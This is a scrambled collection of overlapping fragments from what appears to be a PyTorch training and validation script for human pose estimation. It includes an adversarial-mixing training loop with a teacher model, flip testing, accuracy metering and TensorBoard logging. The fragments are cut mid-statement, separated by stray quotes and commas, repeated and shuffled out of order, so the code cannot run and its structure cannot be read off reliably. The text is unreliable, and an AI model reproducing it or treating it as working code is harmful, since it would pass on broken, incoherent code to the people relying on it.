__init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum =", "loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred = accuracy(outputs, target, args=None, cfg=config) outputs", "meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs = model(input) target = target[0].cuda(non_blocking=True) target_hm", "= outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else:", "'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i,", "mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target,", "save_debug_images(config, input, meta, target_hm, pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True): if not isinstance(nets,", "+ loss_D_kd * args.alpha loss_D.backward() optimizer.step() # G: compute gradient and do update", "criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm * (1 - args.alpha) + loss_D_kd *", "\\ output_flipped.clone()[:, :, :, 0:-1] output = (output + output_flipped) * 0.5 if", "center scale joint c = meta['center'].numpy() s = meta['scale'].numpy() score = meta['score'].numpy() preds,", "+ 1 return name_values, perf_indicator # markdown format output def _print_name_value(name_value, full_arch_name): names", "args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if i %", "cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if i % config.PRINT_FREQ", "update(self, val, n=1): self.val = val self.sum += val * n self.count +=", "<gh_stars>10-100 # ------------------------------------------------------------------------------ # Copyright (c) Microsoft # Licensed under the MIT License.", "copy import numpy as np import torch from core.evaluate import accuracy from core.inference", "if isinstance(model, list): model = model[0].train() model_D = model[1].train() else: model.train() end =", "logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps)", "+ 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta, target_hm, pred*4, outputs,", "output = (output + output_flipped) * 0.5 if not cpu: target = target[0].cuda(non_blocking=True)", "value\"\"\" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum", "+= n self.avg = self.sum / self.count if self.count != 0 else 0", "losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt)", "AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(model, list):", "record loss losses.update(loss.item(), num_images) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config)", "isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for _ in inputs] target = targets[0].cuda(non_blocking=True) target_weight", "metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1)", "list): output_flipped = outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if", "meta, target_hm, pred * 4, output, prefix) print('=> The average inference time is", "acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() # corresponding center scale joint", "'valid_acc', acc.avg, global_steps ) if isinstance(name_values, list): for name_value in name_values: writer.add_scalars( 'valid',", "markdown format output def _print_name_value(name_value, full_arch_name): names = name_value.keys() values = name_value.values() num_values", "' '.join(['| {:.3f}'.format(value) for value in values]) + ' |' ) class AverageMeter(object):", "= meta['score'].numpy() preds, maxvals = get_final_preds( config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx +", "2:4] = s[:, 0:2] all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx +", "(input, target, target_weight, meta) in tqdm(enumerate(val_loader)): if not cpu: input = input.cuda() #", "(num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6)) image_path = [] filenames", "= s[:, 0:2] all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx + num_images,", "net in nets: if net is not None: for param in net.parameters(): param.requires_grad", "loss losses.update(loss.item(), num_images) _, avg_acc, cnt, pred = accuracy(output, target, args=None, cfg=config) output", "= _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if i %", "target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight) num_images = input.size(0) #", "meta['center'].numpy() s = meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals = get_final_preds( config, args,", "if len(full_arch_name) > 15: full_arch_name = full_arch_name[:8] + '...' logger.info( '| ' +", "num_images = input.size(0) # measure accuracy and record loss losses.update(loss.item(), num_images) _, avg_acc,", "outputs, prefix) def validate(config, args, val_loader, val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False):", "inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp", "output = outputs[-1] else: output = outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped", ":, 0:2] all_preds[idx:idx + num_images, :, 2:3] = maxvals # double check this", "numpy as np import torch from core.evaluate import accuracy from core.inference import get_final_preds,", "set_require_grad(nets, requires_grad=True): if not isinstance(nets, list): nets = [nets] for net in nets:", "= 0 def update(self, val, n=1): self.val = val self.sum += val *", "\\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\", "= preds[:, :, 0:2] all_preds[idx:idx + num_images, :, 2:3] = maxvals # double", "s[:, 0:2] all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5]", "infer_start = time.time() outputs = model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu += (infer_end", "target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs = inputs.cuda(non_blocking=True)", ":, :, 0:-1] output = (output + output_flipped) * 0.5 if not cpu:", "len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output =", "in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if writer_dict: writer = writer_dict['writer'] global_steps", "def train_advmix(config, args, train_loader, models, criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time =", "net is not None: for param in net.parameters(): param.requires_grad = requires_grad def train_advmix(config,", "inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm =", "optimizer_G.step() # measure accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred", "parts all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx + num_images, 2:4] =", "= target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight) num_images = input.size(0)", "format output def _print_name_value(name_value, full_arch_name): names = name_value.keys() values = name_value.values() num_values =", "= name_value.keys() values = name_value.values() num_values = len(name_value) logger.info( '| Arch ' +", "speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val,", "target_weight) num_images = input.size(0) # measure accuracy and record loss losses.update(loss.item(), num_images) _,", "[] idx = 0 feat_dict = {} with torch.no_grad(): end = time.time() time_gpu", "'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir,", "time.time() torch.cuda.synchronize() time_gpu += (infer_end - infer_start) if isinstance(outputs, list): output = outputs[-1]", "utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis import save_debug_images import", "name_value.values() num_values = len(name_value) logger.info( '| Arch ' + ' '.join(['| {}'.format(name) for", "epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps", "= loss_D_hm * (1 - args.alpha) + loss_D_kd * args.alpha loss_D.backward() optimizer.step() #", "absolute_import from __future__ import division from __future__ import print_function import time import logging", "AverageMeter() acc = AverageMeter() # switch to evaluate mode model.eval() num_samples = len(val_dataset)", "Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import absolute_import from __future__ import", "time.time() time_gpu = 0. for i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)): if", "heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] = \\ output_flipped.clone()[:,", "writer.add_scalars( 'valid', dict(name_value), global_steps ) else: writer.add_scalars( 'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] =", "logger.info('|---' * (num_values+1) + '|') if len(full_arch_name) > 15: full_arch_name = full_arch_name[:8] +", "logging.getLogger(__name__) def train(config, args, train_loader, model, criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time", "'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer", "msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t' \\", "= AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(models, list): model =", "= criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm * (1 - args.alpha) + loss_D_kd", "accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back, tofloat, coord_norm,", "step set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp) output = outputs loss_G = -criterion(output,", "- end) end = time.time() # corresponding center scale joint c = meta['center'].numpy()", "model_name = config.MODEL.NAME if isinstance(name_values, list): for name_value in name_values: _print_name_value(name_value, model_name) else:", "values]) + ' |' ) class AverageMeter(object): \"\"\"Computes and stores the average and", "= AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(models,", ") class AverageMeter(object): \"\"\"Computes and stores the average and current value\"\"\" def __init__(self):", "0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f} samples/s\\t'", "all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx + num_images, 4] = np.prod(s*200,", "self.sum += val * n self.count += n self.avg = self.sum / self.count", "/ len(val_loader)) name_values, perf_indicator = val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path, filenames, imgnums", "input, meta, target_hm, pred * 4, output, prefix) print('=> The average inference time", "= 0 self.avg = 0 self.sum = 0 self.count = 0 def update(self,", "target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight) num_images", "utils.vis import save_debug_images import torch.nn as nn from tqdm import tqdm import torch.nn.functional", "{acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer =", "= AverageMeter() acc = AverageMeter() if isinstance(model, list): model = model[0].train() model_D =", "= model[0].train() model_D = model[1].train() else: model.train() end = time.time() for i, (input,", "losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir,", "output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature is not aligned, shift", "target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight) # compute gradient and do", "full_arch_name + ' ' + ' '.join(['| {:.3f}'.format(value) for value in values]) +", "from utils.vis import save_debug_images import torch.nn as nn from tqdm import tqdm import", "[_.cuda(non_blocking=True) for _ in inputs] target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta =", "as nn from tqdm import tqdm import torch.nn.functional as F logger = logging.getLogger(__name__)", "criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses", "= models[0].train() model_G = models[1].train() model_teacher = models[2].eval() else: models.train() optimizer = optimizers[0]", "model(input) target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs,", "False) optimizer_G.zero_grad() outputs = model(tmp) output = outputs loss_G = -criterion(output, target, target_weight)", "torch.from_numpy(output_flipped.copy()) # feature is not aligned, shift flipped heatmap for higher accuracy if", "i % config.PRINT_FREQ == 0: msg = 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'", "% config.PRINT_FREQ == 0: msg = 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\", "dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps + 1 return name_values, perf_indicator # markdown", "'| ' + full_arch_name + ' ' + ' '.join(['| {:.3f}'.format(value) for value", "+ full_arch_name + ' ' + ' '.join(['| {:.3f}'.format(value) for value in values])", "outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else: output_flipped = outputs_flipped", "= outputs loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure", "cnt, pred = accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end", "= _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() # corresponding center", "self.val = 0 self.avg = 0 self.sum = 0 self.count = 0 def", "= np.zeros((num_samples, 6)) image_path = [] filenames = [] imgnums = [] idx", "dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1,", "epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps", "and stores the average and current value\"\"\" def __init__(self): self.reset() def reset(self): self.val", "import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis import save_debug_images import torch.nn", "input.size(0)) _, avg_acc, cnt, pred = accuracy(outputs, target, args=None, cfg=config) outputs = _tocuda(outputs)", "output_flipped[:, :, :, 1:] = \\ output_flipped.clone()[:, :, :, 0:-1] output = (output", "not cpu: target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss =", "if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] = \\ output_flipped.clone()[:, :, :, 0:-1] output", "num_images, :, 0:2] = preds[:, :, 0:2] all_preds[idx:idx + num_images, :, 2:3] =", "+ num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1)", "list): model = models[0].train() model_G = models[1].train() model_teacher = models[2].eval() else: models.train() optimizer", "AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(models, list):", "0 feat_dict = {} with torch.no_grad(): end = time.time() time_gpu = 0. for", "np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5] = score image_path.extend(meta['image']) idx += num_images if", "F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in", "inputs = [_.cuda(non_blocking=True) for _ in inputs] target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True)", "|' ) class AverageMeter(object): \"\"\"Computes and stores the average and current value\"\"\" def", "{} with torch.no_grad(): end = time.time() time_gpu = 0. for i, (input, target,", "else: inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model,", "all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6)) image_path", "0 self.sum = 0 self.count = 0 def update(self, val, n=1): self.val =", "' |' ) class AverageMeter(object): \"\"\"Computes and stores the average and current value\"\"\"", "do update step set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp) output = outputs loss_G", "isinstance(name_values, list): for name_value in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps ) else: writer.add_scalars(", "(inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel = meta['model_supervise_channel']", "len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps']", "[nets] for net in nets: if net is not None: for param in", "all_preds[idx:idx + num_images, :, 0:2] = preds[:, :, 0:2] all_preds[idx:idx + num_images, :,", "target_hm, pred * 4, output, prefix) print('=> The average inference time is :',", "_tocuda from utils.vis import save_debug_images import torch.nn as nn from tqdm import tqdm", ") if isinstance(name_values, list): for name_value in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps )", "imgnums = [] idx = 0 feat_dict = {} with torch.no_grad(): end =", "writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta),", "global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if isinstance(name_values, list): for name_value in", "args.alpha loss_D.backward() optimizer.step() # G: compute gradient and do update step set_require_grad(model, False)", "infer_start) if isinstance(outputs, list): output = outputs[-1] else: output = outputs if config.TEST.FLIP_TEST:", "output_flipped) * 0.5 if not cpu: target = target[0].cuda(non_blocking=True) target_hm = target target_weight", "- args.alpha) + loss_D_kd * args.alpha loss_D.backward() optimizer.step() # G: compute gradient and", "name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if writer_dict: writer = writer_dict['writer'] global_steps =", "1 return name_values, perf_indicator # markdown format output def _print_name_value(name_value, full_arch_name): names =", "target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if i", "acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if i % config.PRINT_FREQ ==", ":, 0:-1] output = (output + output_flipped) * 0.5 if not cpu: target", "cnt, pred = accuracy(output, target, args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time()", "corresponding center scale joint c = meta['center'].numpy() s = meta['scale'].numpy() score = meta['score'].numpy()", "name_values, perf_indicator # markdown format output def _print_name_value(name_value, full_arch_name): names = name_value.keys() values", "output_dir, all_boxes, image_path, filenames, imgnums ) model_name = config.MODEL.NAME if isinstance(name_values, list): for", "tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc =", "output_flipped = torch.from_numpy(output_flipped.copy()) # feature is not aligned, shift flipped heatmap for higher", "all_preds, output_dir, all_boxes, image_path, filenames, imgnums ) model_name = config.MODEL.NAME if isinstance(name_values, list):", "gradient and do update step optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy and record", "maxvals # double check this all_boxes parts all_boxes[idx:idx + num_images, 0:2] = c[:,", "from __future__ import division from __future__ import print_function import time import logging import", "time_gpu = 0. for i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)): if not", "tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0])", "+= inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm", "def update(self, val, n=1): self.val = val self.sum += val * n self.count", "n=1): self.val = val self.sum += val * n self.count += n self.avg", "= meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals = get_final_preds( config, args, output.clone().cpu().numpy(), c,", "idx = 0 feat_dict = {} with torch.no_grad(): end = time.time() time_gpu =", "as F logger = logging.getLogger(__name__) def train(config, args, train_loader, model, criterion, optimizer, epoch,", "1) all_boxes[idx:idx + num_images, 5] = score image_path.extend(meta['image']) idx += num_images if i", "for list_index in range(1, len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach = model(tmp.detach())", "writer_dict: writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar(", "def _print_name_value(name_value, full_arch_name): names = name_value.keys() values = name_value.values() num_values = len(name_value) logger.info(", "infer_end = time.time() torch.cuda.synchronize() time_gpu += (infer_end - infer_start) if isinstance(outputs, list): output", "target, target_weight, meta) in tqdm(enumerate(val_loader)): if not cpu: input = input.cuda() # compute", "self.sum = 0 self.count = 0 def update(self, val, n=1): self.val = val", "self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count", "preds[:, :, 0:2] all_preds[idx:idx + num_images, :, 2:3] = maxvals # double check", "> 15: full_arch_name = full_arch_name[:8] + '...' logger.info( '| ' + full_arch_name +", "compute gradient and do update step optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy and", "args=None, cfg=config) outputs = _tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time()", "end = time.time() time_gpu = 0. for i, (input, target, target_weight, meta) in", "writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta,", "name_value in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps ) else: writer.add_scalars( 'valid', dict(name_values), global_steps", "= model[1].train() else: model.train() end = time.time() for i, (input, target, target_weight, meta)", "+ '|') if len(full_arch_name) > 15: full_arch_name = full_arch_name[:8] + '...' logger.info( '|", "# mask_channel = meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for", "else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature is not aligned, shift flipped heatmap for", "writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if isinstance(name_values, list):", "models[2].eval() else: models.train() optimizer = optimizers[0] optimizer_G = optimizers[1] end = time.time() for", "from __future__ import absolute_import from __future__ import division from __future__ import print_function import", "len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps']", "0 self.avg = 0 self.sum = 0 self.count = 0 def update(self, val,", "logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config, input, meta, target_hm, pred", "loss_D.backward() optimizer.step() # G: compute gradient and do update step set_require_grad(model, False) optimizer_G.zero_grad()", "= criterion(outputs, target, target_weight) # compute gradient and do update step optimizer.zero_grad() loss.backward()", "else: models.train() optimizer = optimizers[0] optimizer_G = optimizers[1] end = time.time() for i,", "target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs,", "optimizer_G.zero_grad() outputs = model(tmp) output = outputs loss_G = -criterion(output, target, target_weight) *", "AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(model, list): model = model[0].train()", "end) end = time.time() # corresponding center scale joint c = meta['center'].numpy() s", ") else: writer.add_scalars( 'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps + 1 return", "acc = AverageMeter() if isinstance(models, list): model = models[0].train() model_G = models[1].train() model_teacher", "args.alpha) + loss_D_kd * args.alpha loss_D.backward() optimizer.step() # G: compute gradient and do", ") save_debug_images(config, input, meta, target_hm, pred * 4, output, prefix) print('=> The average", "(output + output_flipped) * 0.5 if not cpu: target = target[0].cuda(non_blocking=True) target_hm =", "models.train() optimizer = optimizers[0] optimizer_G = optimizers[1] end = time.time() for i, (inputs,", "6)) image_path = [] filenames = [] imgnums = [] idx = 0", "def reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count =", "prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta, target_hm, pred*4, outputs, prefix) def", "= {} with torch.no_grad(): end = time.time() time_gpu = 0. for i, (input,", "outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped", "import time import logging import os, copy import numpy as np import torch", "save_debug_images(config, input, meta, target_hm, pred * 4, output, prefix) print('=> The average inference", "output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped =", "torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature is not aligned, shift flipped heatmap", "flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) #", "double check this all_boxes parts all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx", "accuracy and record loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred = accuracy(outputs, target,", "= global_steps + 1 return name_values, perf_indicator # markdown format output def _print_name_value(name_value,", "0 def update(self, val, n=1): self.val = val self.sum += val * n", "AverageMeter() if isinstance(models, list): model = models[0].train() model_G = models[1].train() model_teacher = models[2].eval()", "AverageMeter() # switch to evaluate mode model.eval() num_samples = len(val_dataset) all_preds = np.zeros(", "target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight) num_images =", "4] = np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5] = score image_path.extend(meta['image']) idx +=", "1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix", "model.train() end = time.time() for i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time()", "\\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg)", "1:] = \\ output_flipped.clone()[:, :, :, 0:-1] output = (output + output_flipped) *", "inference time is :', time_gpu / len(val_loader)) name_values, perf_indicator = val_dataset.evaluate( config, all_preds,", "in net.parameters(): param.requires_grad = requires_grad def train_advmix(config, args, train_loader, models, criterion, optimizers, epoch,", "in names]) + ' |' ) logger.info('|---' * (num_values+1) + '|') if len(full_arch_name)", "else: output = outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped = model(input_flipped) if", "0:2] all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5] =", "len(val_loader)) name_values, perf_indicator = val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path, filenames, imgnums )", "time.time() for i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) #", "= criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm *", "= AverageMeter() # switch to evaluate mode model.eval() num_samples = len(val_dataset) all_preds =", "s) all_preds[idx:idx + num_images, :, 0:2] = preds[:, :, 0:2] all_preds[idx:idx + num_images,", "time.time() if i % config.PRINT_FREQ == 0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time", "{acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer =", "meta['score'].numpy() preds, maxvals = get_final_preds( config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images,", "{}'.format(name) for name in names]) + ' |' ) logger.info('|---' * (num_values+1) +", "for i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel", "args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc,", "__future__ import absolute_import from __future__ import division from __future__ import print_function import time", "model_teacher = models[2].eval() else: models.train() optimizer = optimizers[0] optimizer_G = optimizers[1] end =", "= len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes = np.zeros((num_samples,", "= [] imgnums = [] idx = 0 feat_dict = {} with torch.no_grad():", "dict(name_value), global_steps ) else: writer.add_scalars( 'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps +", "model[0].train() model_D = model[1].train() else: model.train() end = time.time() for i, (input, target,", "dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) 